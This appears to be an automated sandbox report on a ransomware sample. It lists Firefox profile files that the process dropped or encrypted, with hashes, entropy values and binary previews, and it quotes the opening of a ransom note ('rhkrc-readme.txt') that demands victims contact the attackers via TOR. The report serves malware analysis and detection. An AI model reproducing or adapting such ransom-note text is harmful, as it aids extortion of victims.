                  Preview: ..l....{. ..........i$)..9g..{......Y.X..,l`{.*..f.......^(.j(..wr.S.....?.X|.}..q.d7.cK.^....iie....;.8.?L{...2.kG..-.\H.?<hP...r..N.K.LVW..Yi.,l..q....}Pt.7\....E.egth.!V..o...^.......$Z.F..(#=.....M.i...i.....u...&\7.............%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp........................................................................................'F.....i.I..x..T)l..4L..k..O..}Q.WZ..:Y.n...........\...
                  /home/user/.cache/mozilla/firefox/u5o5kk16.default/safebrowsing/test-harmful-simple.pset
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):248
                  Entropy (8bit):5.133871259643435
                  Encrypted:false
                  SSDEEP:3:VhNHHVJvfb7PmWE9CiYa1ESghgEUMzpET77cP1wQb45u1QfWyR:d11zmhOO/EUyp6Xcdb45uG
                  MD5:738ED1E6F44254DF14E9898ADDCD0585
                  SHA1:36418D193B03F382B18F825FB71A2B6146A23459
                  SHA-256:BF633459EF8A895BF715F724DFDF14E33F74F34DD3192A261A9FF2A23FB1D408
                  SHA-512:A1007FB36B74B52722D2808ED2D06FAB8A298B5D18213BC5972BB2647C53553DC01985A2406A76F5A106BEBB43FD1E33AADC6227F07753B51DC8A400B8ECD10B
                  Malicious:false
                  Reputation:low
                  Preview: .9-....iP..{.=..%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp.........................................................................................#.)B.....I.~9..F.,s.......k91.I...D......}#............
                  /home/user/.cache/mozilla/firefox/u5o5kk16.default/safebrowsing/test-harmful-simple.sbstore
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):464
                  Entropy (8bit):6.5625775943814215
                  Encrypted:false
                  SSDEEP:6:nvTSFCAMDtM5a2ZcYZNfuCRuyhVlMrZCXu11zmhOO/EUyp6XcqLjkwlle:nmMDtcjNfKyDlOZUuL2DcUB3kwe
                  MD5:D1E82659F873E3DBF3A4D2829710BBDC
                  SHA1:5426B291DBA0B36764AEADFA5A758214C5C7CD12
                  SHA-256:772920FAEE6BFD5153EEF42C9EAFA8F6B001021F3B5C726A8E79696681485A40
                  SHA-512:188C4E308F25CBC98EF15B9D03E444FCDEBAE0519E2DE8B877E56A9C5121C47BD92C8FEBCE42F3469C317BA2DBE775E7EA0D3934D34ECC85EDA24053284BBD5D
                  Malicious:false
                  Reputation:low
                  Preview: ......Ih.0.....f`a"..E~b.d......~b@F...H:.....Jh...B^..oFW1s.#(....2v..........e.....4...t.....t%.......M.<.A.F..;.....{._.l%QR....:F;.7...d.....ZO,>..;.Y.5.y8...]..gW..[.....J....+'..q.e.W..Hb..W..|....p..s^...~..>.."..0.=......O..%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp..........................................................................................V.....=...J.q....@...g.......J..'...V..8.u............
                  /home/user/.cache/mozilla/firefox/u5o5kk16.default/safebrowsing/test-malware-simple.pset
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):248
                  Entropy (8bit):5.1077009975641054
                  Encrypted:false
                  SSDEEP:3:NwCJz2VJvfb7PmWE9CiYa1ESghgEUMzpET77cP1tuZ1KUG/Ve1yTp2wf64ll/r:GKzy1zmhOO/EUyp6Xc+LKrYNp4Xr
                  MD5:D8BF9D2475E363B5FEADA35089276715
                  SHA1:FE56DC98DF573E15F6620C71C316801BC4CABC59
                  SHA-256:8CC948D673C55D4EBB4B41A09994675D8381949DEA6D6D5F8C0268C81526B356
                  SHA-512:6C92FCEB0809D42C879F0B4DED1A19FD9988FEDC6FDD87197D816BAADE5E5A167693718D52BA1637476030D9B7B99CE974616068D4B9579BD85B09FE13EEF6DD
                  Malicious:false
                  Reputation:low
                  Preview: ....-h.a,m....Ge%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp........................................................................................F...%...&.<...R....^...%. ...1C1M.#..UO...0.........6*.J
                  /home/user/.cache/mozilla/firefox/u5o5kk16.default/safebrowsing/test-malware-simple.sbstore
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):464
                  Entropy (8bit):6.581887719620278
                  Encrypted:false
                  SSDEEP:6:U+2me377D7ylBCV0b2o9obIWPIBm1ZSpMfEMt/gZqt/qBgeLD+2UxHlJh1NsOU16:n2ZIUodW3OMhEgC+zxFJjW2DcUBntI0
                  MD5:8B92C5D38EB81F19479DB7046176205F
                  SHA1:A6736774D9BF3D56E93734C88FA1682F5830B04B
                  SHA-256:0A3EF3B1495E6BF4C8AB751130D17479156D15BCD79CBAAAA393B5448540D8C2
                  SHA-512:1942974CEDDD474135FBD9710370C76B4CD5165ED81FA2410D2C292E36081998FAF5C0206107E0ED18FEA5872F3ED418B160375EA78302E4E97F66BEDEADED99
                  Malicious:false
                  Reputation:low
                  Preview: I3m.P[..Nv......X...J.l..)..IPN...)Q._g..h.........P...?0i.?...eT./......C....3..|...arN.XW.R....._".*.=b$o..X......|0|JU.\.... .......i.."`...BV.P.....8H. .....sz2E8.}"...`x$.....R.[..9..b..G.HF.T..i...)7..X.%8....O......R...[M.W..%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp........................................................................................T....w...xo.&.u!.j.DAC..A...Lq.\E.Qp%..8dg.w........'...
                  /home/user/.cache/mozilla/firefox/u5o5kk16.default/safebrowsing/test-phish-simple.pset
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):248
                  Entropy (8bit):5.15213466695384
                  Encrypted:false
                  SSDEEP:3:CjjEpAegKHVJvfb7PmWE9CiYa1ESghgEUMzpET77cP1l0nAUUmCHR6LwOTll/CVn:Cy7H11zmhOO/EUyp6XcEn0CwMl/CVn
                  MD5:1F599FD5FB25114DAA92254ADE8DF7F0
                  SHA1:8F75A28638D62A9822D0F44C739D45E3E0599136
                  SHA-256:DE9CFD300709C38C626B194854FF6143AFECC951F066B9706B8ED392CC2B2E39
                  SHA-512:52E403680EE44CC580B4925E762A429088F211100CA22AB09051324AB4420AA8798B66CB9C1792E2E7183BFB5385E7E8E00058511C4FC1301D6C5EDA3027E9C6
                  Malicious:false
                  Reputation:low
                  Preview: S`....Ne......I-%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp........................................................................................kQ....km..@...x1/..p(.?...d..i.&$4"$..k ..I...........e.
                  /home/user/.cache/mozilla/firefox/u5o5kk16.default/safebrowsing/test-phish-simple.sbstore
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):464
                  Entropy (8bit):6.618367155517493
                  Encrypted:false
                  SSDEEP:6:ivZlpEFFdYuvZFrK7arvB1LqZjST7xrHMdQF5H9ehuY7V11zmhOO/EUyp6XcAyFs:MIxHrQarvqZ+TtsdQsuY52DcUB4WRPBF
                  MD5:154E9753E9FAFCA7D45FB984130F24C3
                  SHA1:1E293085AB0BEE461FB2F37669AD266874ED0CD4
                  SHA-256:5CB391289294D90727A5FBC124BE330A148F65B3AEE5EB89C35330A083477720
                  SHA-512:90266F53225A6F1B5747A82AE7822395A50C56C552FDBAB68EA70DA0DEF528C73D35529383E6B2AC7E10515006720EBC69D602E521AEAE05D2F433C3E07F7756
                  Malicious:false
                  Reputation:low
                  Preview: 0p}q...!......E.:#X.0..#@M! -]b.li..}..o..k<...p.<.T.....a..a.......b..uZ..S=gTM......M_.c....7..vS ....H..>J....w.....84. ..$..4.m.~.....]w..'.......7..m...Z~;.V.$..dN..J1Y....n........)T.... Z$............8.A~.;.qq.|.F.. ...S.R^".%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp........................................................................................mf&.`@. u.<IJer.:_$..Hz..Hd....w}A.&.].D.+q.........[I.Z
                  /home/user/.cache/mozilla/firefox/u5o5kk16.default/safebrowsing/test-track-simple.pset
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):248
                  Entropy (8bit):5.14909076573544
                  Encrypted:false
                  SSDEEP:3:2fBfb7gD2VJvfb7PmWE9CiYa1ESghgEUMzpET77cP144CCi7JR4BBbwJK09/1Fn:UT1zmhOO/EUyp6XcqFz4LwJKaXn
                  MD5:25755A2B8469ECE4120A8B5F9A20AB43
                  SHA1:60DF6CAEC943D203BBD25F436140D09C4455DC8E
                  SHA-256:04520FBD50649848FBA5850CA77285E31F283B63A26BF2D30B37632C00ADD9F7
                  SHA-512:8B5AA21C2DDF3954BDD789F9972B85D5178849E26889C180105089911B4D9CD996B1516EAEB4338E8B7F1CA79314C2E981AB96104764FC8C6AD51E05DD16D4EE
                  Malicious:false
                  Reputation:low
                  Preview: /..y(...:k...:..%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp........................................................................................\.].g...{..L6.O.x@.ix..v..._.kl/.H}.n.."..\O........q].%
                  /home/user/.cache/mozilla/firefox/u5o5kk16.default/safebrowsing/test-track-simple.sbstore
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):504
                  Entropy (8bit):6.799093301143196
                  Encrypted:false
                  SSDEEP:6:+1f0KDfqnOYbRNHBqvGsPSQMhU27RK/0tcmL+0efhf8zC/11zmhOO/EUyp6XcwuT:+q4qOqHQfoRZh52dz2DcUBAXO1I
                  MD5:9FBC53A23FA774963A024A53E70FD2ED
                  SHA1:05B1EEA96FF8162D43377CF1B399045BE9FB4675
                  SHA-256:C018BA6F7F7440938168915D9871E5E074A91CFEC9966E7A8964CBABA2F93BA0
                  SHA-512:C11D07B49DDBAB71481CE91726936877EF88F0FC19132CD4FB3F39F100BC10CA40BE6A5396C080E8EF5BF0559285D2C2E41DC586815AD2B4FC5F3B9AA8FB4E1F
                  Malicious:false
                  Reputation:low
                  Preview: .O..s.H!w..8......(....2..!..@.B.#.$........Lq...)59.....q...$Y.V...p.... .......h.S.Y.%u.mH.M.Ar8D.j.z.1..c....%b'5...K$...*!..TCt..o....:...8.... .s...<.-Bj.6d....Cw|I.S.6@.H'%.r.5.8.....&3 .O.......,...2............?.N.h.......I..A.L...J.U...&.!G..].c....7..e..~... ...%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp..........................................................................................sUMr7..eE.6..K..m.5.......L..:....:...8"...........fT.
                  /home/user/.cache/mozilla/firefox/u5o5kk16.default/safebrowsing/test-trackwhite-simple.pset
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):248
                  Entropy (8bit):5.107700997564106
                  Encrypted:false
                  SSDEEP:3:Zmu9VzVJvfb7PmWE9CiYa1ESghgEUMzpET77cP1UkqZgDsEdozxYZJ/lsjn:w851zmhOO/EUyp6XcW3CDOxY3kn
                  MD5:664272CB30BCA48F93E699738C7DC329
                  SHA1:F7A6700077F141629FD4E6BE3039609519294C8F
                  SHA-256:9C4563DE7845B84E72FFBBD94EB6FE5573FBF68C9E9E9E250E81D23600AE99FC
                  SHA-512:B2CA4ACD5D29190A4D980F714FB7BDBE2C22A8D9ED21395B6380CCEC65B6D8FE9B3B982E0EFD225C48CC632117CDA7A3AD449E4EFA25ECD14138FD5A9914EBE7
                  Malicious:false
                  Reputation:low
                  Preview: ...y..!.{.6...g.%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp........................................................................................x|h..n..T.N,.8.....<`.Q.....{l.}.C.2......<...........L.
                  /home/user/.cache/mozilla/firefox/u5o5kk16.default/safebrowsing/test-trackwhite-simple.sbstore
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):464
                  Entropy (8bit):6.613981522104045
                  Encrypted:false
                  SSDEEP:6:QNyigjHeJpS+/tFgj3eX932eoQEFsjD1oN11zmhOO/EUyp6XcCpfieRg:QNVdtFMeXJ2eDZoNL2DcUBffieG
                  MD5:54D29C765EB7B2C7960508BAE26F897B
                  SHA1:5F414EF6ADD51FFBC76EE8FC37FC865D3AB87DB4
                  SHA-256:2B875CAD29827BA819D3A1CD6B3C495513826AEF7B3980BB70E7327C7646E2E8
                  SHA-512:CC806BA0F27FB43850529B10E7684064DBE56DBE6BDA3E6FE3631DE779D299E5736E4285ABA8EE4DD47C40AEB6C440EE6702CA2C0CDD3481787806C68C9DD922
                  Malicious:false
                  Reputation:low
                  Preview: .q.z....E-.Q...\.I...2%/..w.w.I\.0..5...%...#./.'+PW17$..Z.`..E$.=..`.._....#Aq.[-O....x...U....5........d.I...Y..R.a2M...*..j..n.,qBl&..C......S..o...p..eJK.]...`.AX`..g1q.S..\..y...A.N.Q......../.#[wnF..n%..ph...........@....}....%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp........................................................................................~..3.$......|i..D.W/.....x...*Xf..v..{R.#+..............
                  /home/user/.cache/mozilla/firefox/u5o5kk16.default/safebrowsing/test-unwanted-simple.pset
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):248
                  Entropy (8bit):5.1379823483880065
                  Encrypted:false
                  SSDEEP:3:e3PUPGuHVJvfb7PmWE9CiYa1ESghgEUMzpET77cP1XthvmPXPRRpcoxu/1n:e3PVu11zmhOO/EUyp6Xc7hO/PRRioM/1
                  MD5:B567A734113DBCD2E5FEEE4E13118F61
                  SHA1:EBADCAD2655D5A8882465AAFAD885BF6237204CA
                  SHA-256:97ACE53C105F3D0BC5839AC05FE950F10818E93CEAE32CEC4E038C83210ADC7E
                  SHA-512:FE8F532A0C84E254CAF689C4C9AC32608503B9ED439B04FFC7D90AE47777A60F9B3C5F6D7A3CA8B1491020348CB889856AF66D33E5719AE19AF3773BE7327F35
                  Malicious:false
                  Reputation:low
                  Preview: ...=g..RS<r.....%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp........................................................................................]....'.%....d...].4F.#.<]...U*..1]...ZJ.D...............
                  /home/user/.cache/mozilla/firefox/u5o5kk16.default/safebrowsing/test-unwanted-simple.sbstore
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):464
                  Entropy (8bit):6.587469811141361
                  Encrypted:false
                  SSDEEP:6:6bg2GRUFAQqVSAwJaKbAVOvP5by/iMB+/ZRW88efPLgc1zmhOO/EUyp6XcN6MnOa:wXCSVJaKbAVOw/w/nW4gg2DcUBCJ
                  MD5:37522C72B39A35E2A0103E5AA260C015
                  SHA1:AD1D4D1802CC5E89CF07DCD80FEB28A2E78B66E3
                  SHA-256:8E3B9FE26564483B92EAF945343FAD97244C8364D13707CB816D1812ED800E1F
                  SHA-512:23460A75A5117A1D3FC5C56777AC3177348433E7196D74FBCAF60004C41977423D41D48FF3E37D5B26283E904BCCFAAAD0BA177286AA0655B2935EAF4B0B7AAE
                  Malicious:false
                  Reputation:low
                  Preview: #.0...:Z...'../:.>.X...2<J.....N.U~.Ga1...n..246..8J&...,...G.#.1e..7.T.mRi5.i./..P[-...+.@.7.....s...]..]....b...y...D..q....\.0....k.s..@d..[E.8.............^....i.......y.....r....6..m..[Z...D..\...../W..V.....*.....K.o...sA..Q.o%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp.............................................................................................O'u.;$5..f......*..m..2o..;GS.?&$.5...^........._E.
                  /home/user/.cache/mozilla/firefox/u5o5kk16.default/startupCache/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.cache/mozilla/firefox/u5o5kk16.default/startupCache/scriptCache-child.bin
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):185467
                  Entropy (8bit):7.99873954450613
                  Encrypted:true
                  SSDEEP:3072:ZJpY+JdjnBkkE7y8dfKeFHjsHAEbqfUrHyAEo8soh9BEPptSxPzTyF7Z2:ZJpTJEP7y8EeFDsnKG9vSNQk
                  MD5:A6A77517077351F7F905D023CA3198BA
                  SHA1:1F82C847468EE4792B399D623E3085CBDB867DEE
                  SHA-256:A33BC31A5973E578BAA56ADE508B08486980A246A6688862C49E700A1665688C
                  SHA-512:221CEB43326DDCFA114756FB65A476DCF066C1985CBE31C75901F1F08273C6BDCAA6B4326E9870622DA6E909EFBBC58496151539027A1E1F98E45502F1245D65
                  Malicious:false
                  Reputation:low
                  Preview: ...1..'...@)h.....[.[w.'.a.c..PN.%k/...Qmx..A.r..f...Qb.O...,k9.b..Gj&..R..;....?}....j0?;...HiuW7...K..9..+.E..f...P...."N....9...G...~.4..............:q..t..,+jy.X.Y..Z$X.....V..5#.....rd</..<l.........p..f...V.J.S+..Y..../.M.^.=y...j.UB.x..6Dx...o}.L.ZR...........I.M.|D@........K.........wc..#.P....e.<!........p.....tK5j.[.W.Nr9...`..z..(...5.....R...b.y...%jbW.p...l.!.W.x......lA..........^N.....Y-...C.....Z.......c.....'..D6.S...o&.F.An..X.I.....O..V..{..Vm.u......1d}.....C@.;..........._.R......^..\.5?...{S.=....b..s..3..`..c.B..)..!?.4..+V.......j...l..<{y...-!/.v.....yD/(....:.]:+....4.k.9.Pv......~....*n~.....c.. ..nl:R..l..}...8....X..`&A. :].b<.f.o.f...-..,.g..$...K.........i.>:d!.\)..L..O.q..*..P....j..).....Y3.......@;s..6..!.....g!..R....[C...q..<...R.c.q..r....%..a.Z...^f..(&0....w/.....&.B..v8}8T#....F.v.*...[...[.. Q..O.._S".]-..9.\o..^>..|~Y..Xdu...cu#b.Ui..c..?8$.N...$j.o.....>.h.z..k....)..m...H..........Gn...;.......T...r.EL...l....l...8...Qk..J.....M.I<SmH..#8..H.
                  /home/user/.cache/mozilla/firefox/u5o5kk16.default/startupCache/scriptCache.bin
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):3827867
                  Entropy (8bit):7.999948214743355
                  Encrypted:true
                  SSDEEP:98304:8ktqlJUNAZpQn2fQZ91ItQL4JzTCUwD5Dd/EojbdJV:7EENA48QZ91UQ805Dd/N1f
                  MD5:E88AD66367B127D158FCB1F819A6819A
                  SHA1:5C22CE81C9127FA362DFA937FE60233D28D9C9F5
                  SHA-256:33E9E25DB00103FC94322527503926FAF45591DC2B619C6FA56EFFC1A48D15A5
                  SHA-512:1B7E30EB65542BFCE52251D68D74B24F97235CFE9E64729CBDA1225660FFEE312CF48F8AF701025C87F86FFED075123A0E9CB96B7F3148CD63C563B88131ECD1
                  Malicious:false
                  Reputation:low
                  Preview: Hdz..I.z......>..I.]QU.Y/.....A..I@....p.j.*..4%x.{.\..!..t..._......J..-HB.....!|}.Y..[...$......J.z....O...........&2S..Y..!'..8.. ..p..xmya...N.....B-.s............<Y.a.=..)...gZI......|,.....X6...-..3.4]...^..@...J5......R....(..E...+.m2.p..\=.?..-X/X.8.'z...,.4.......t`V.....J....&.\I..s..H\".!B#....H..q8.....:....&tm.%q..L["..&......,.Ke...q......-j..$.Kn.........IJ.uN..%`.83.?.Ju~..`S..1.?dQ.f....9=.JK..=.t....tl~..VW._q...U*..]...='.eA.8.........nxw............GN..K...#................w.8.........x.....#.......eq...G..........M...T..y.C......T...........b..W....>.x...m.[:>..Z..;k...)E.E...../O[..N...j....aQ.....z7.aE.$m.T<...........Q..SN..<`._..|"..7U...,M'M........-.xk.._. ZNYm-B..;...#...X...'.....O..*M....)...9..._..F...cI-B...eL.!$...qpi..ps..A...6......|a.<T.8?.....g..2[..E....TW-..7(@..d 8ph}j..D+.g#......6...$.7u45.sV....;..$.....*.E...|.";c..q...c....................A... .p&0H....cA}.W....;+z.C...c..U..'.B9P|.I..)B.!.R9!QR.D.....0..}..G.........C...l.. L.A.,+.'.+'*.i..
                  /home/user/.cache/mozilla/firefox/u5o5kk16.default/startupCache/startupCache.8.little
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):3595261
                  Entropy (8bit):7.99995171892388
                  Encrypted:true
                  SSDEEP:98304:q5d13zTpjuYKYX5kX+sg/We+d+p7beNEt:6fBjuYwXkOe+OK8
                  MD5:9970D58A99A99CDEB96DD870FBAF8CBC
                  SHA1:640336083547DFF3CEBAEA0B4B9B147FB6644E56
                  SHA-256:2E7F7E90ADA60524896E18EC51562488E52DD578F7601736F1CE2D3362935A69
                  SHA-512:69498A55BD079C6415B1AB3A21E9176EBDF8C53B98D3EACC07F2683CA4798BBF343C1A0EE62D669AD47B47CFD0A42D646AEAC6871B1C9D7F7C35D68A4BE53711
                  Malicious:false
                  Reputation:low
                  Preview: .x.E.....j.*.........4,..........G..<.^...X.|.+.S....YbQ.H.....J.!.:.zR....hO.......|.......[....Je......y.!R.E.]|....]..cX....&..8]..........M:......lk2....j.:..)P1.H..T.'y....D.%..2!......;.2~E....C.lh..FDeU.%|.....y...#......A...b.%.....S...k+...P...F....%......&.1.-kI....t....?.."<.^..(8U;.p.$..8z./GG.\..V......"..M..a15.9...h.Z.#..z3..V....4M.%........;.x.l....|....A..t....!!.....s...)lV.D.r..[........'EwK(.U.6..9..x...e.v...z....p"......k..7.=....f.1..b$H..|....N!>8.......Z.&..evl..nD.&..=J.h.....r8Z.e.?.u.^.o....pM.8.+....o..G..?.....#.C.,4.E.....xss......+j.f..:.....J.....T.....U.7..........?..'.n.v.sP.*...w.z...p...!fXL...x.2 ..<...,b].[..;........HgA......&Rj.(.....PI...A`|....\C.........k...y.......?........R..-s%..N....J.fa..I.(.]v..m....-a..V..A....}....-..n...@JEW+...F....x=...B..)#.$y-.k......n.}#.z......0.3........$.....C...wd..fK..4.B..h.K.....q...N.....U....r..7.....^.....1Mbk...Ux.......7;..4...V"....=.V....)....R.t%...h!.[B....E.........0..W.a..j.K.h....~./.ED.... #
                  /home/user/.cache/mozilla/firefox/u5o5kk16.default/startupCache/urlCache.bin
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):3355
                  Entropy (8bit):7.890700634442574
                  Encrypted:false
                  SSDEEP:48:brkNo1XgpQHE/R8j65j/K/j8LiVvYJqY9TH+FbH/n3bZyZJGdyQRUDx:XliT/R8juy/j8WrYojnhdsDx
                  MD5:0806E548B9C27C82941E42FC6F759018
                  SHA1:EE86E336032C80E2EC125F4307C1F7EEDA55B617
                  SHA-256:DDF6EB911CE04A03D2AE2F67E6028EC9D44FF920ECAE54E69EF761FC178FBC8B
                  SHA-512:24085EC1C0CC6C25C983CB11E785E8A7F9E8961FDF85A56EFD4C749F9336573781E7486A8A15EF0AE983E74356115FC610A88B58746B3F03A93F7A4D0E4B6B40
                  Malicious:false
                  Reputation:low
                  Preview: 7........x.Y&}f.3.....)..n....kHv)[6...\un.O...e.X[+...*.......,....?.......y.5.4..}.....A.Rm.}.o'.....7.zN}...b'e......0..Z....eSa......A.........<....h..=......~..I..2...+.*hA563..j..aJ/!.F.zD....F.B...A....s|....-Hqj...b+.....q...\E/.....M.g.p.ix......D}..J.*x\..(.t......kz..:.........y7d@mAU-.8.b..\.L.]X.....,...l..k2.N...B.....m=.'............F......N.......9....'....;zG.g|D.P.P.4.K..~JB.....|s.*k..s...1u.:.......x........[`.j.&f..X.^..d..g=..G-C....g....z..q.$....p.^.R......xb. _3....q.X.....{..`.E.h[O..$..%.}.T.%.z'(...d.-........C.i2..@....<b..H..........I....<`"k....'.g&g..bV.z.a.Q.....x.Q...l..`..%....&Ax...9...}.W<.~v.....Q`.3K+..........w,..O..:..D..dCQ5.N.%..y..4..V....#........T&.....L....bh...T.A...|..;YK..pN....-?6.........:...P2...i....r)KF.d......4.I.I...l........H.j.........1.*....g.....ET......[y9.W....!..T.C.@KWB.......m.R.W.....u../.N..._$e]0...X~.0.G..'p-..0.}NZ....c................g..y...|.TH.MO..j;.(V.p...r....#....o..T.....#..8.....k...uZ..........-$..+z.A.Y..
                  /home/user/.cache/mozilla/firefox/u5o5kk16.default/startupCache/webext.sc.lz4
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):73567
                  Entropy (8bit):7.997488696390837
                  Encrypted:true
                  SSDEEP:1536:ljvRukSqr2QKXt5Pp5TGiZLBiRDN/9mXFMHkRBPnUDze6SucXx/:31hKbR5TD9BmBsXbdUvSucXF
                  MD5:DDC550C99ABB16D2B012335573AFF541
                  SHA1:47B7651384F9055BDFE7EDC992DA19167D5A0582
                  SHA-256:BB4D1F9C819C62DE91D2B4CB74341CF36EBDF5C201640C72011381BA9AF24AA7
                  SHA-512:0C264750B3C509570F9C2674E181DEF766921C9B8E6A0592C3A39EA7FA39A9D8861646216568699B1025AE4EE0BE1394F2988D02C2AFF863790C41DFB299544E
                  Malicious:false
                  Reputation:low
                  Preview: .>c._.%...M.=...^z^X?.\.~<@.I....+9.I.......B.b....mU...B.....Y.7'..@D.6....#......a..c.uA..TAW..r.k.r.\.0.(..z.m....|I.........`2s..'.Oo.u}....._n. ...!..UU_.1Mf....:..S.:.j\H.Y=...o...V..o+.:.M..L-2...W...q.....v.{....L.$....+.9..>......JZ..vs. j~{...m2...cc......o.m.h....X...B....0..u.`......P.u.r..0Y5.........6........;.rT7._.X...O..W....|;Y.\.q..........Z.*..L....G ..0..&..g..MY..j....``S.r.'....s..;o.FY".....J$.....6X*.....O.?w|..c?X...'.E.M..'dC.I......jb.)....N..Sk...!....Dy.rN.@..1.v.hQk..m..R..s=*w.Uu7..7f..{].Rv.._..*..h..!C.[. \B.:=....E.I......0......+......@..\..a..R.O..~.R.WR_....n...#.<.F.^.E..1.......0..._.Mn.M..[.b.%,...{vg....:..*GLw.HD...%.$...;..x..z7.i'^.....T.........X+.=.%J....]...g.C.....>...n..x........9.,.i..'.F...S.3e8+L.2.`....W..}...S3..&"e.HaGj....R..........77....:.|..w.g.X.Z.2c.....*..f...(..y.'........8j..1....zX|ld.9..&..0...l!?.+.._}B.Ug....&..N.P)<.A.;|...A....u.-[.+l..:w...P..C.;.=....Y.@U-..+.k?6B.....MEO3....*=R......T7..C..h..(-.2Sb.6O.......~..
                  /home/user/.cache/mozilla/firefox/u5o5kk16.default/thumbnails/f1777111f5d0f1c81ffa04de751128fa.png
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):5127
                  Entropy (8bit):7.927809700358541
                  Encrypted:false
                  SSDEEP:96:/QITGuOHzSEkLEEpv/6r/o1Op/ogoVoi5T+nukDV7:oITGuSmEGEEFSZ4dl+ukN
                  MD5:A310326AB76A91CFEF781CDFBFEA87BC
                  SHA1:E163E65B8C446E2FC48965C998D277534F54B1CF
                  SHA-256:239792A333CC80BD2F95826F288148B5C36D1EBF9FCCE5EB5FBA274631F300DE
                  SHA-512:F3D189489E6A4C7FD5577713DB7E6B06D1A475893E048EEE6310A32C99AE683B5C4D5C611418FBBE292E196CF99B687A7D54882AE9DDCFCE8315A86E6CD842DD
                  Malicious:false
                  Reputation:low
                  Preview: .>u.3.~X...".lhms.Q.IT.....q5E....:.8i....A...P6......0:#.rI8...rT..]..ft....,Q.-...|..O>.''D......t..J..#....].8.7f.................rOn|P....`.W%.=[......+..p...y...|K.|\}~.E.|..f:.f..z.L.".Y........|.........*Hh.tB.y.A.U.(.......u.ND..+.vxD?......VRm.je......Sof?...a.t..jhI..:r.BV>s...N..p.|.6..x.Py...#.`......:}..bn.Bol..*..}..w....\Q....>.x..(L.J..i...d.L.2...&.:7d..bE"..]..;....5.L} .T..[L|..g..8..L..M....2o.r..^...AZY(.....3..........?....TD....C...e.."........;..m.=.J..nvb=.~.J.:X%V.,.....y...@.hk_..b.}.F<..U,&..&.x.^....`...8.I<.I..{@?jx.1..].........q"....-m.....c......y....k./0mQ.|q..o..<...:K?8.v)K![44..FRr#.tXi@i..._&D..1^#..`x.t..y.X.....[..!g...^Y..1.j..U.c{;(^.........E..3.P.on..r..........iAv>.......5.g.}....X.L{..W...1%..Z~........k.I...{...3.k{.......~z5.#e.5...cg..@....(|.././..f0....P(.......S....~x....|.X...,6...a.]..'5L..Ny.......Dm.....N 